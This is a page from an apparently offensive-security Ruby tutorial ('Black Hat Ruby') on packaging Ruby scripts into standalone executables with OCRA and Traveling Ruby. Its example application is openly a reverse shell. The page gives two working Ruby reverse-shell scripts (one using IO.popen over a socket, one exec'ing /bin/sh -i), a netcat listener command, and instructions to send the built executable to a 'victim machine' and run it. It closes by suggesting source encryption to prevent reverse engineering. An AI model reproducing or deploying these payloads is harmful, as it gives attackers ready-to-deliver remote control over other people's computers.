Module 0x2 | System Kung Fu

Twitter Github NEW! Black Hat Ruby Buy Me a Coffee
Search…
Packaging
Many questions about building a standalone application that doesn't require Ruby to be pre-installed on the system. Of-course, due attacking machine you cant grantee that ruby is installed on the target system. So here we will demonstrate some ways to do that.
One-Click Ruby Application(OCRA) Builder
OCRA (One-Click Ruby Application) builds Windows executables from Ruby source code. The executable is a self-extracting, self-running executable that contains the Ruby interpreter, your source code and any additionally needed ruby libraries or DLL.
It's Windows support only, not really ;)
Features
LZMA Compression (optional, default on)
Ruby 1.8.7, 1.9.3, 2.0.0 and 2.1.5 support
Both windowed/console mode supported
Includes gems based on usage, or from a Bundler Gemfile
To install OCRA
1
gem install ocra
Copied!
So all what to need is to have your application.
Suppose we have the following script, a reverse shell of course ;)
1
#!/usr/bin/env ruby
2
# KING SABRI | @KINGSABRI
3
require 'socket'
4
if ARGV[0].nil? || ARGV[1].nil?
5
    puts "ruby #{__FILE__}.rb [HACKER_IP HACKER_PORT]\n\n"
6
    exit
7
end
8
ip, port = ARGV
9
s = TCPSocket.new(ip,port)
10
while cmd = s.gets
11
  IO.popen(cmd,"r"){|io|s.print io.read}
12
end
Copied!
from our Windows Attacker machine cmd.exe
1
C:\Users\admin\Desktop>ocra rshell.rb --windows --console
Copied!
Results
1
C:\Users\admin\Desktop>ocra rshell.rb --windows --console
2
=== Loading script to check dependencies
3
ruby C:/Users/admin/Desktop/rshell.rb.rb [HACKER_IP HACKER_PORT]
4
​
5
=== Attempting to trigger autoload of Gem::ConfigFile
6
=== Attempting to trigger autoload of Gem::DependencyList
7
=== Attempting to trigger autoload of Gem::DependencyResolver
8
=== Attempting to trigger autoload of Gem::Installer
9
=== Attempting to trigger autoload of Gem::RequestSet
10
=== Attempting to trigger autoload of Gem::Source
11
=== Attempting to trigger autoload of Gem::SourceList
12
=== Attempting to trigger autoload of Gem::SpecFetcher
13
=== Attempting to trigger autoload of CGI::HtmlExtension
14
=== Detected gem ocra-1.3.5 (loaded, files)
15
===     6 files, 191333 bytes
16
=== Detected gem io-console-0.4.3 (loaded, files)
17
=== WARNING: Gem io-console-0.4.3 root folder was not found, skipping
18
=== Including 53 encoding support files (3424768 bytes, use --no-enc to exclude)
19
=== Building rshell.exe
20
=== Adding user-supplied source files
21
=== Adding ruby executable ruby.exe
22
=== Adding detected DLL C:/Ruby22/bin/zlib1.dll
23
=== Adding detected DLL C:/Ruby22/bin/LIBEAY32.dll
24
=== Adding detected DLL C:/Ruby22/bin/SSLEAY32.dll
25
=== Adding detected DLL C:/Ruby22/bin/libffi-6.dll
26
=== Adding library files
27
=== Compressing 10622666 bytes
28
=== Finished building rshell.exe (2756229 bytes)
Copied!
In the same directory, you'll find an exe file rshell.exe. Send it on the windows victim machine which doesn't have ruby installed and run it.
1
rshell.exe 192.168.0.14 9911
Copied!
from our attacking machine we already listening on 9911
1
nc -lvp 9911
Copied!
Traveling-ruby
From official site "Traveling Ruby is a project which supplies self-contained, "portable" Ruby binaries: Ruby binaries that can run on any Linux distribution and any OS X machine. It also has Windows support (with some caveats). This allows Ruby app developers to bundle these binaries with their Ruby app, so that they can distribute a single package to end users, without needing end users to first install Ruby or gems."
Note: The following script has been taken from the official docs.
Preparation
1
mkdir rshell
2
cd rshell
Copied!
Create your application -in our case, reverse shell- in "rshell" folder
rshell.rb
1
#!/usr/bin/env ruby
2
# KING SABRI | @KINGSABRI
3
require 'socket'
4
if ARGV.size < 2
5
  puts "ruby #{__FILE__} [HACKER_IP] [HACKER_PORT]\n\n"
6
  exit 0 
7
end
8
ip, port = ARGV
9
s = TCPSocket.open(ip,port).to_i
10
exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",s,s,s)
Copied!
Test it 
1
ruby rshell.rb 
2
# => ruby rshell.rb [HACKER_IP] [HACKER_PORT]
Copied!
Creating package directories
The next step is to prepare packages for all the target platforms, by creating a directory each platform, and by copying your app into each directory. (Assuming that your application could differ from OS to another)
1
mkdir -p rshell-1.0.0-linux-x86/lib/app
2
cp rshell.rb rshell-1.0.0-linux-x86/lib/app/
3
​
4
mkdir -p rshell-1.0.0-linux-x86_64/lib/app
5
cp rshell.rb rshell-1.0.0-linux-x86_64/lib/app/
6
​
7
mkdir -p rshell-1.0.0-osx/lib/app/
8
cp rshell.rb rshell-1.0.0-osx/lib/app/
Copied!
Next, create a packaging directory and download Traveling Ruby binaries for each platform into that directory. Then extract these binaries into each packaging directory. You can find a list of binaries at the Traveling Ruby Amazon S3 bucket. For faster download times, use the CloudFront domain "http://d6r77u77i8pq3.cloudfront.net". In this tutorial we're extracting version 20141215-2.1.5.
1
mkdir packaging
2
cd packaging
3
wget -c  http://d6r77u77i8pq3.cloudfront.net/releases/traveling-ruby-20141215-2.1.5-linux-x86.tar.gz
4
wget -c  http://d6r77u77i8pq3.cloudfront.net/releases/traveling-ruby-20141215-2.1.5-linux-x86_64.tar.gz
5
wget -c  http://d6r77u77i8pq3.cloudfront.net/releases/traveling-ruby-20141215-2.1.5-osx.tar.gz
6
cd ..
7
​
8
mkdir rshell-1.0.0-linux-x86/lib/ruby && tar -xzf packaging/traveling-ruby-20141215-2.1.5-linux-x86.tar.gz -C rshell-1.0.0-linux-x86/lib/ruby
9
mkdir rshell-1.0.0-linux-x86_64/lib/ruby && tar -xzf packaging/traveling-ruby-20141215-2.1.5-linux-x86_64.tar.gz -C rshell-1.0.0-linux-x86_64/lib/ruby
10
mkdir rshell-1.0.0-osx/lib/ruby && tar -xzf packaging/traveling-ruby-20141215-2.1.5-osx.tar.gz -C rshell-1.0.0-osx/lib/ruby
Copied!
Now, each package directory will have Ruby binaries included. It looks like this: Your directory structure will now look like this:
1
rshell/
2
 |
3
 +-- rshell.rb
4
 |
5
 +-- rshell-linux86/
6
 |   |
7
 |   +-- lib/
8
 |       +-- app/
9
 |       |   |
10
 |       |   +-- rshell.rb
11
 |       |
12
 |       +-- ruby/
13
 |           |
14
 |           +-- bin/
15
 |           |   |
16
 |           |   +-- ruby
17
 |           |   +-- ...
18
 |           +-- ...
19
 |
20
 +-- rshell-linux86_64/
21
 |   |
22
 |  ...
23
 |
24
 +-- rshell-osx/
25
     |
26
    ...
Copied!
Quick sanity testing
Let's do a basic sanity test by running your app with a bundled Ruby interpreter. Suppose that you are developing on OS X. Run this:
1
cd rshell-osx
2
./lib/ruby/bin/ruby lib/app/rshell.rb
3
# => ruby rshell.rb.rb [HACKER_IP  HACKER_PORT]
4
​
5
cd ..
Copied!
Creating a wrapper script
Now that you've verified that the bundled Ruby interpreter works, you'll want create a wrapper script. After all, you don't want your users to run /path-to-your-app/lib/ruby/bin/ruby /path-to-your-app/lib/app/rshell.rb. You want them to run /path-to-your-app/rshell.
Here's what a wrapper script could look like:
1
#!/bin/bash
2
set -e
3
​
4
# Figure out where this script is located.
5
SELFDIR="`dirname \"$0\"`"
6
SELFDIR="`cd \"$SELFDIR\" && pwd`"
7
​
8
# Run the actual app using the bundled Ruby interpreter.
9
exec "$SELFDIR/lib/ruby/bin/ruby" "$SELFDIR/lib/app/rshell.rb"
Copied!
Save this file as packaging/wrapper.sh in your project's root directory. Then you can copy it to each of your package directories and name it rshell:
1
chmod +x packaging/wrapper.sh
2
cp packaging/wrapper.sh rshell-1.0.0-linux-x86/rshell
3
cp packaging/wrapper.sh rshell-1.0.0-linux-x86_64/rshell
4
cp packaging/wrapper.sh rshell-1.0.0-osx/rshell
Copied!
Finalizing packages
1
tar -czf rshell-1.0.0-linux-x86.tar.gz rshell-1.0.0-linux-x86
2
tar -czf rshell-1.0.0-linux-x86_64.tar.gz rshell-1.0.0-linux-x86_64
3
tar -czf rshell-1.0.0-osx.tar.gz rshell-1.0.0-osx
4
rm -rf rshell-1.0.0-linux-x86
5
rm -rf rshell-1.0.0-linux-x86_64
6
rm -rf rshell-1.0.0-osx
Copied!
Congratulations, you have created packages using Traveling Ruby!
An x86 Linux user could now use your app like this:
1.
The user downloads rshell-1.0.0-linux-x86.tar.gz.
2.
The user extracts this file.
3.
The user runs your app:
1
/path-to/rshell-1.0.0-linux-x86/rshell
2
# => ruby rshell.rb.rb [HACKER_IP  HACKER_PORT]
Copied!
Automating the process
Going through all of the above steps on every release is a hassle, so you should automate the packaging process, for example by using Rake. Here's how the Rakefile could look like:
1
PACKAGE_NAME = "rshell"
2
VERSION = "1.0.0"
3
TRAVELING_RUBY_VERSION = "20150210-2.1.5"
4
​
5
desc "Package your app"
6
task :package => ['package:linux:x86', 'package:linux:x86_64', 'package:osx']
7
​
8
namespace :package do
9
  namespace :linux do
10
    desc "Package your app for Linux x86"
11
    task :x86 => "packaging/traveling-ruby-#{TRAVELING_RUBY_VERSION}-linux-x86.tar.gz" do
12
      create_package("linux-x86")
13
    end
14
​
15
    desc "Package your app for Linux x86_64"
16
    task :x86_64 => "packaging/traveling-ruby-#{TRAVELING_RUBY_VERSION}-linux-x86_64.tar.gz" do
17
      create_package("linux-x86_64")
18
    end
19
  end
20
​
21
  desc "Package your app for OS X"
22
  task :osx => "packaging/traveling-ruby-#{TRAVELING_RUBY_VERSION}-osx.tar.gz" do
23
    create_package("osx")
24
  end
25
end
26
​
27
file "packaging/traveling-ruby-#{TRAVELING_RUBY_VERSION}-linux-x86.tar.gz" do
28
  download_runtime("linux-x86")
29
end
30
​
31
file "packaging/traveling-ruby-#{TRAVELING_RUBY_VERSION}-linux-x86_64.tar.gz" do
32
  download_runtime("linux-x86_64")
33
end
34
​
35
file "packaging/traveling-ruby-#{TRAVELING_RUBY_VERSION}-osx.tar.gz" do
36
  download_runtime("osx")
37
end
38
​
39
def create_package(target)
40
  package_dir = "#{PACKAGE_NAME}-#{VERSION}-#{target}"
41
  sh "rm -rf #{package_dir}"
42
  sh "mkdir -p #{package_dir}/lib/app"
43
  sh "cp rshell.rb #{package_dir}/lib/app/"
44
  sh "mkdir #{package_dir}/lib/ruby"
45
  sh "tar -xzf packaging/traveling-ruby-#{TRAVELING_RUBY_VERSION}-#{target}.tar.gz -C #{package_dir}/lib/ruby"
46
  sh "cp packaging/wrapper.sh #{package_dir}/rshell"
47
  if !ENV['DIR_ONLY']
48
    sh "tar -czf #{package_dir}.tar.gz #{package_dir}"
49
    sh "rm -rf #{package_dir}"
50
  end
51
end
52
​
53
def download_runtime(target)
54
  sh "cd packaging && curl -L -O --fail " +
55
    "http://d6r77u77i8pq3.cloudfront.net/releases/traveling-ruby-#{TRAVELING_RUBY_VERSION}-#{target}.tar.gz"
56
end
Copied!
You can then create all 3 packages by running:
1
rake package
Copied!
You can also create a package for a specific platform by running one of:
1
rake package:linux:x86
2
rake package:linux:x86_64
3
rake package:osx
Copied!
You can also just create package directories, without creating the .tar.gz files, by passing DIR_ONLY=1:
1
rake package DIR_ONLY=1
2
rake package:linux:x86 DIR_ONLY=1
3
rake package:linux:x86_64 DIR_ONLY=1
4
rake package:osx DIR_ONLY=1
Copied!
On Victim Machine
You now have three files which you can distribute to end users.
1
rshell-1.0.0-linux-x86.tar.gz
2
rshell-1.0.0-linux-x86_64.tar.gz
3
rshell-1.0.0-osx.tar.gz
Copied!
Suppose the end user is on Linux x86_64. S/he uses your app by downloading rshell-1.0.0-linux-x86_64.tar.gz, extracting it and running it:
1
wget rshell-1.0.0-linux-x86_64.tar.gz
2
...
3
tar xzf rshell-1.0.0-linux-x86_64.tar.gz
4
cd rshell-1.0.0-linux-x86_64
5
./rshell
6
# => ruby rshell.rb.rb [HACKER_IP  HACKER_PORT]
Copied!
mruby
mruby CLI A utility for setting up a CLI with mruby that compiles binaries to Linux, OS X, and Windows.
Prerequisites
mruby-cli
Docker
Docker Compose
Developer introduction
​https://www.youtube.com/watch?v=OvuZ8R4Y9xA​
Close Source code
Sometimes we don't want to disclose our source code for whatever reason, but we still want to share our applications either commercially or for free. Here a commercial solution for that purpose, RubyEncoder.
RubyEncoder protects Ruby scripts by compiling Ruby source code into a bytecode format and this is followed by encryption. This protects your scripts from reverse engineering. Ruby scripts protected with RubyEncoder can be executed but cannot be used to extract Ruby source code as there is no source code remaining within the protected script in any form.
Array
File manipulation
Copy link
Contents
Packaging
One-Click Ruby Application(OCRA) Builder
Traveling-ruby
Close Source code